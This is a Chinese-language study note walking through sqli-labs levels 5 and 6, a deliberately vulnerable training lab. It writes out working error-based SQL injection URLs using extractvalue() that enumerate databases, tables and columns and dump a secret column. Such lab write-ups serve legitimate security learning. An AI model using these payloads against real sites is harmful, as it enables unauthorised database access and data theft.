sqli-labs靶场5~6笔记—报错注入

sqli-labs

Less-5

先正常访问

复制代码
http://sqli-labs/Less-5/?id=1

发现不再像1~4关回显用户名和密码。

由于没有回显位置,我们无法直接看到回显内容。

这里就需要尝试如:报错注入(看是否回显报错信息)、盲注(布尔盲注、时间盲注)、写入文件。

(这一关是报错注入)

1.判断注入点:

尝试单引号,发现报错。

复制代码
http://sqli-labs/Less-5/?id='
复制代码
http://sqli-labs/Less-5/?id=''

正常回显。

可知使用单引号闭合。

现在尝试extractvalue()报错注入是否可行。

复制代码
http://sqli-labs/Less-5/?id=' or extractvalue(1,concat(0x7e,user()))--+

2.爆库

复制代码
#爆库
http://sqli-labs/Less-5/?id=' or extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata)))--+

3.爆表

复制代码
#爆challenges库中的表
http://sqli-labs/Less-5/?id=' or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')))--+

4.爆列

复制代码
#爆challenges库2m4sx0cpn5表中的列
http://sqli-labs/Less-5/?id=' or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='2m4sx0cpn5')))--+

5.爆字段

复制代码
#爆challenges库2m4sx0cpn5表中的secret_NOQD列
http://sqli-labs/Less-5/?id=' or extractvalue(1,concat(0x7e,(select group_concat(secret_NOQD) from challenges.2m4sx0cpn5)))--+

到此结束。

Less-6

与less5的差别就是闭合符号是双引号。

不再赘述。直接到最后一步吧

复制代码
#爆challenges库2m4sx0cpn5表中的secret_NOQD列
http://sqli-labs/Less-6/?id=" or extractvalue(1,concat(0x7e,(select group_concat(secret_NOQD) from challenges.2m4sx0cpn5)))--+
相关推荐
中屹指纹浏览器1 小时前
2026指纹浏览器性能瓶颈分析与优化技巧
经验分享·笔记
雷工笔记2 小时前
随笔|走!跳楼去!
笔记
就叫飞六吧2 小时前
国产数据库gbase8s安装-网盘
笔记
网络工程小王3 小时前
【大数据技术详解】——Kibana(学习笔记)
大数据·笔记·学习
努力的lpp3 小时前
2024小迪安全课程第四节复习笔记
笔记·安全
雷工笔记5 小时前
AI使用|通过AI学习物料分类编码表
笔记·学习
Shea的笔记本5 小时前
MindSpore实战笔记:WaveNet音乐生成复现全记录
笔记
koo3645 小时前
pytorch深度学习笔记23
pytorch·笔记·深度学习
FakeOccupational6 小时前
【电路笔记 STM32】Cortex-M7 内核上的数据缓存结构图 + MPU内存保护单元 + Cache基本操作 + Cache&DMA 时序图
笔记·stm32·缓存